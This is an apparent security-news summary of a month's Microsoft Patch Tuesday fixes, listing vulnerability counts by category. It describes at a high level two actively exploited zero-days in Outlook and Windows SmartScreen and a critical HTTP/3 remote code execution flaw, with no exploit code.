This month we got patches for 76 vulnerabilities. According to Microsoft, nine are critical, and two are already being exploited.
The number of bugs in each vulnerability category is listed below:
- 21 Elevation of Privilege Vulnerabilities
- 2 Security Feature Bypass Vulnerabilities
- 27 Remote Code Execution Vulnerabilities
- 15 Information Disclosure Vulnerabilities
- 4 Denial of Service Vulnerabilities
- 10 Spoofing Vulnerabilities
- 1 Edge – Chromium Vulnerability
This month’s Patch Tuesday fixes two zero-day vulnerabilities actively exploited in attacks.
Publicly disclosed and actively exploited zero-day vulnerabilities
CVE-2023-23397-Microsoft Outlook Elevation of Privilege Vulnerability
According to the advisory, an attacker who successfully exploited this vulnerability could access a user’s Net-NTLMv2 hash which could be used as a basis of an NTLM Relay attack against another service to authenticate as the user.- The attacker could exploit this vulnerability by sending a specially crafted email that triggers automatically when it is retrieved and processed by the Outlook client. This could lead to exploitation BEFORE the email is viewed in the Preview Pane. The CVSS for this vulnerability is 9.8.
In a private threat analytics report seen by BleepingComputer, Microsoft says that this Outlook vulnerability was exploited by STRONTIUM
, a state-sponsored Russian hacking group.
Windows SmartScreen Security Feature Bypass Vulnerability
According to the advisory, an attacker can craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MOTW tagging. The CVSS for this vulnerability is 5.4. This vulnerability was discovered by Google’s Threat Analysis Group, which spotted it being exploited by the Magniber ransomware operation
. Another Critical Vuln Worth MentioningAnother critical vulnerability worth mentioning is Remote Code Execution (RCE) affecting HTTP Protocol Stack (CVE-2023-23392
). A prerequisite for a server to be vulnerable is that the binding has HTTP/3 enabled and the server uses buffered I/O. HTTP/3 support for services is a new feature of Windows Server 2022. This vulnerability requires no user interaction, no privileges, and low attack complexity. The CVSS for this vulnerability is 9.8.